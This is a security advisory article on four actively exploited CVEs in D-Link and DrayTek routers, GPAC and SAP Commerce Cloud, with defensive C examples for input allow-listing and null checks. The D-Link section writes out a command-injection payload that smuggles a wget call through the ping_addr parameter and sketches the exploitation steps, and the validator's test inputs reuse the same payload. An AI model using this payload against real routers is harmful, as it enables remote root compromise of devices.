4 Critical High-Severity Vulnerabilities: CISA has added four critical vulnerabilities to its Known Exploited Vulnerabilities catalog, drawing attention to serious risks affecting D-Link and DrayTek routers, the GPAC multimedia framework, and SAP Commerce Cloud.
Introduction
The Cybersecurity and Infrastructure Security Agency (CISA) has recently added four new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, indicating active exploitation in the wild. These vulnerabilities pose significant threats to organizations utilizing the affected technologies.
CISA’s latest update highlights several critical issues. CVE-2023-25280 is an OS command injection vulnerability in the D-Link DIR-820 router. CVE-2020-15415 is likewise an OS command injection flaw and affects multiple DrayTek Vigor routers.
CVE-2021-4043 is a null pointer dereference vulnerability in the Motion Spell GPAC multimedia framework. Lastly, CVE-2019-0344 is a deserialization-of-untrusted-data flaw in SAP Commerce Cloud, posing a significant risk to systems running this platform.
Vulnerability Technical Overview
CVE-2023-25280: Vulnerability in D-Link DIR-820 Router
On March 16, 2023, a severe OS command injection vulnerability was discovered in the D-Link DIR-820LA1_FW105B03 router, allowing attackers to gain root privileges.

This issue is triggered through a specially crafted payload targeting the ping_addr parameter, presenting a significant risk to internet-connected devices. The vulnerability is found in the pingV4Msg function of the “/ping.ccp” component, which lets attackers escalate privileges to root.
The affected version is DIR820LA1_FW105B03, and the vulnerable code is in the /sbin/ncc2 binary. Specifically, the sub_49EDF8 function reads the ping_addr parameter from requests to /ping.ccp and passes it into a system command. When the ccp_act parameter is set to pingV4Msg, the ccp_ping function calls this vulnerable code path, allowing command injection.
Although the function attempts to filter malicious input, it fails to filter characters such as %0a (an encoded newline) and $, so the filter can be bypassed. To exploit the flaw, an attacker can emulate the firmware with a tool such as FirmAE, set up a local web server, and send an attack vector such as “ccp_act=pingV4Msg&ping_addr=%0awget hxxp://192.168.0.2%0a” to trigger the vulnerability.
CVE-2020-15415: Security Flaw in DrayTek Vigor Routers
This vulnerability impacts DrayTek Vigor3900, Vigor2960, and Vigor300B routers running firmware versions earlier than 1.5.1. It allows remote command execution through shell metacharacters in a filename when the text/x-python-script content type is used, posing a serious threat to users. The issue is documented under CVE-2020-14472 and CVE-2020-15415, both of which are classified as critical.
DrayTek has acknowledged the risk of exploitation through the WebUI on the Vigor 2960, 3900, and 300B models. On June 17, 2020, the company released firmware version 1.5.1.1 to resolve the vulnerability. Affected users are strongly encouraged to upgrade to this or a later version. Until the upgrade is completed, users should disable remote access or apply an access control list (ACL) to restrict remote access.
Firmware updates are available for users in the UK and Ireland. Users with remote access enabled should disable it if it’s unnecessary, and if remote access is required, it should be limited to a list of trusted IP addresses via an ACL. Alternatively, users can secure remote administration through a VPN or manage their devices centrally using VigorACS.
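Both router flaws above share the same root cause: a request parameter (the ping_addr value on the D-Link DIR-820, a filename on the DrayTek Vigor models) reaches a shell command after a filter that blocks some characters but not others. The following C program is an added example written for this article; it is not D-Link or DrayTek code, and the parameter handling, size limits and test inputs are assumptions. It shows the defensive pattern for both cases: decode the parameter first, then accept it only if every character is one that a ping target or a filename legitimately needs.

```c
/* Added example for this article, not D-Link or DrayTek code: allow-list validation of
 * untrusted router request parameters before they reach a shell. Names, limits and inputs are assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode %XX escapes and '+' from a query-string value into out.
 * Returns the decoded length, or -1 on a malformed escape or oversized input. */
int url_decode(const char *in, char *out, size_t outlen) {
    size_t o = 0;
    for (size_t i = 0; in[i] != '\0'; i++) {
        if (o + 1 >= outlen) return -1;
        if (in[i] == '%') {
            int hi = hexval((unsigned char)in[i + 1]);
            int lo = (hi < 0) ? -1 : hexval((unsigned char)in[i + 2]);
            if (lo < 0) return -1;
            out[o++] = (char)(hi * 16 + lo);
            i += 2;
        } else {
            out[o++] = (in[i] == '+') ? ' ' : in[i];
        }
    }
    out[o] = '\0';
    return (int)o;
}

/* Strict dotted-quad IPv4 literal: exactly four decimal octets in 0..255. */
int is_ipv4_literal(const char *s) {
    int octets = 0;
    while (*s != '\0') {
        long v = 0;
        int digits = 0;
        while (isdigit((unsigned char)*s) && ++digits <= 3) v = v * 10 + (*s++ - '0');
        if (digits == 0 || digits > 3 || v > 255) return 0;
        octets++;
        if (*s == '.' && s[1] != '\0') s++;   /* step over an inner dot */
        else if (*s != '\0') return 0;        /* trailing dot or any other char */
    }
    return octets == 4;
}

/* Hostname: letters, digits, '-' and '.'; labels of 1..63 chars that do not
 * start or end with '-'; total length 1..253. Anything else is rejected. */
int is_hostname(const char *s) {
    size_t n = strlen(s);
    if (n == 0 || n > 253) return 0;
    size_t label = 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c == '.') {
            if (label == 0 || s[i - 1] == '-') return 0;
            label = 0;
        } else if (isalnum(c) || c == '-') {
            if (label == 0 && c == '-') return 0;
            if (++label > 63) return 0;
        } else {
            return 0;   /* newline, '$', ';', '`', space and so on */
        }
    }
    return label > 0 && s[n - 1] != '-';
}

/* Ping target exactly as it arrives in the query string: decode, then allow-list.
 * A value made only of digits and dots must be a valid IPv4 literal. */
int is_safe_ping_target(const char *raw_param) {
    char decoded[256];
    if (url_decode(raw_param, decoded, sizeof decoded) < 0) return 0;
    if (strspn(decoded, "0123456789.") == strlen(decoded)) return is_ipv4_literal(decoded);
    return is_hostname(decoded);
}

/* Uploaded filename: a short basename of [A-Za-z0-9._-] that is not hidden,
 * does not look like a command option and contains no ".." sequence. */
int is_safe_upload_filename(const char *name) {
    size_t n = strlen(name);
    if (n == 0 || n > 64 || name[0] == '.' || name[0] == '-') return 0;
    if (strstr(name, "..") != NULL) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-')) return 0;
    }
    return 1;
}

int main(void) {
    /* Constructed inputs: two legitimate targets, the encoded-newline form
     * described for the DIR-820, and a value carrying a shell variable. */
    const char *targets[] = {"192.168.0.2", "router.example",
                             "%0awget hxxp://192.168.0.2%0a", "10.0.0.1$PATH"};
    for (size_t i = 0; i < 4; i++)
        printf("ping_addr=%-32s -> %s\n", targets[i],
               is_safe_ping_target(targets[i]) ? "accepted" : "rejected");
    return 0;
}
```

Because the check runs on the decoded value, an encoded newline (%0a) is rejected together with $, ;, backticks and spaces, which is the gap the D-Link filter left open. Allow-listing what is valid is more robust than deny-listing known-bad characters, and the validated value should still be handed to the ping or file-handling code as a separate argument rather than spliced into a shell string.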
CVE-2021-4043: Vulnerability in Motion Spell GPAC
On February 4, 2022, a null pointer dereference vulnerability was discovered in the GPAC library, affecting versions prior to 1.1.0. Classified as a medium severity risk with a CVSS score of 5.8, this vulnerability falls under CWE-476 (NULL Pointer Dereference): the software dereferences a pointer it expects to be valid when the pointer is actually null.
The most common consequence of such vulnerabilities is a denial of service (DoS), as dereferencing a null pointer often results in process crashes unless proper exception handling is in place. Even with exception handling, restoring the software to a stable state can be difficult. In rare cases, if the null pointer corresponds to the memory address 0x0 and privileged code is able to access it, it could potentially lead to unauthorized code execution or memory manipulation.
To mitigate the risks associated with null pointer dereference vulnerabilities, it is essential to verify all pointers for null values before using them. Choosing programming languages that inherently reduce the risk of such issues can also be helpful. Developers should ensure that all function return values are checked for null before use. Additionally, care must be taken to prevent race conditions in concurrent environments, which could introduce additional risks.
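The mitigation for this class of bug is mechanical but easy to skip: every function that can legitimately fail to find something must signal that failure, and every caller must check before dereferencing. The C sketch below is an added example, not GPAC code; the movie, track and sample-table structures and the constructed input are assumptions that only mirror the shape of a media parser. Lookups return NULL or an error code, and the accessor functions propagate the error instead of touching a missing table.

```c
/* Added example, not GPAC code: a media-parser sketch in which every lookup
 * that can fail returns NULL or an error code, and callers check it before
 * dereferencing. Structures and sample data are constructed for the article. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

typedef struct {
    uint32_t sample_count;
    const uint32_t *durations;  /* NULL if the table was never parsed */
} sample_table_t;

typedef struct {
    uint32_t track_id;
    sample_table_t *stts;       /* NULL when the file omits the box */
} track_t;

typedef struct {
    size_t track_count;
    track_t *tracks;            /* NULL when no track boxes were found */
} movie_t;

enum { OK = 0, ERR_NULL_ARG = -1, ERR_NOT_FOUND = -2, ERR_BAD_INDEX = -3 };

/* Returns NULL when the track does not exist; callers must check. */
track_t *find_track(movie_t *mov, uint32_t track_id) {
    if (mov == NULL || mov->tracks == NULL) return NULL;
    for (size_t i = 0; i < mov->track_count; i++)
        if (mov->tracks[i].track_id == track_id) return &mov->tracks[i];
    return NULL;
}

/* Fetch one sample duration, reporting failure instead of crashing. */
int sample_duration(movie_t *mov, uint32_t track_id, uint32_t idx, uint32_t *out) {
    if (out == NULL) return ERR_NULL_ARG;
    track_t *t = find_track(mov, track_id);
    if (t == NULL || t->stts == NULL || t->stts->durations == NULL) return ERR_NOT_FOUND;
    if (idx >= t->stts->sample_count) return ERR_BAD_INDEX;
    *out = t->stts->durations[idx];
    return OK;
}

/* Sum all sample durations; 0 for a missing track or table. */
uint64_t track_total_duration(movie_t *mov, uint32_t track_id) {
    track_t *t = find_track(mov, track_id);
    if (t == NULL || t->stts == NULL || t->stts->durations == NULL) return 0;
    uint64_t total = 0;
    for (uint32_t i = 0; i < t->stts->sample_count; i++) total += t->stts->durations[i];
    return total;
}

/* Constructed input: track 1 is well-formed, track 2 lacks its sample table. */
static const uint32_t durations_t1[] = {1024, 1024, 512};
static sample_table_t stts_t1 = {3, durations_t1};
static track_t tracks[] = {{1, &stts_t1}, {2, NULL}};
static movie_t movie = {2, tracks};

movie_t *constructed_movie(void) { return &movie; }

int main(void) {
    movie_t *m = constructed_movie();
    uint32_t d = 0;
    int rc = sample_duration(m, 1, 0, &d);
    printf("track 1 sample 0: rc=%d duration=%u\n", rc, (unsigned)d);
    printf("track 2 sample 0: rc=%d (no sample table)\n", sample_duration(m, 2, 0, &d));
    printf("track 7 sample 0: rc=%d (no such track)\n", sample_duration(m, 7, 0, &d));
    printf("track 1 total: %llu\n", (unsigned long long)track_total_duration(m, 1));
    return 0;
}
```

The constructed movie has one well-formed track and one whose sample table is absent, as a truncated or hostile file might leave it; the accessors return ERR_NOT_FOUND for the second track instead of faulting on a null pointer. In a real parser the same check belongs at every point where a box is optional, and fuzzing with malformed files is the practical way to find the places where it was forgotten.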
CVE-2019-0344: Security Vulnerability in SAP Commerce Cloud
On August 14, 2019, a vulnerability in SAP Commerce Cloud was discovered, stemming from unsafe deserialization, which affects multiple versions and could allow arbitrary code execution with ‘Hybris’ user rights. Identified as CVE-2019-0344, this issue specifically impacts versions 6.4, 6.5, 6.6, 6.7, 1808, 1811, and 1905 of the virtualjdbc extension, making it susceptible to code injection attacks.
CVE-2019-0344 is particularly dangerous because it allows attackers to execute arbitrary code on a target system by exploiting insecure deserialization within the virtualjdbc extension. This could lead to unauthorized code execution on affected systems with the privileges of the ‘Hybris’ user.
The vulnerability’s technical details highlight the critical risk of code injection due to the insecure deserialization process. To mitigate this, users must act quickly by applying security patches released by SAP, monitoring for unusual system activity, and restricting access to vulnerable systems.
For long-term security, it is vital to keep SAP Commerce Cloud up-to-date with the latest patches and follow secure coding practices to prevent future code injection vulnerabilities. Regular updates and patching are key to protecting systems running the virtualjdbc extension from exploitation.
Conclusion
CISA’s recent update to its Known Exploited Vulnerabilities (KEV) catalog underscores the critical risks posed by several vulnerabilities in widely used technologies, including D-Link and DrayTek routers, the GPAC multimedia framework, and SAP Commerce Cloud. These vulnerabilities, CVE-2023-25280, CVE-2020-15415, CVE-2021-4043, and CVE-2019-0344, highlight the importance of timely patching and secure system configurations to prevent potential exploitation.
Organizations using affected devices or software should immediately implement available security patches, disable unnecessary remote access, and follow best practices for secure coding and system maintenance. By staying vigilant and proactive in addressing these vulnerabilities, organizations can significantly reduce the risk of unauthorized access, code execution, and service disruptions.
The ongoing threat landscape emphasizes the need for continuous monitoring, regular updates, and robust security practices to safeguard sensitive systems and data from exploitation.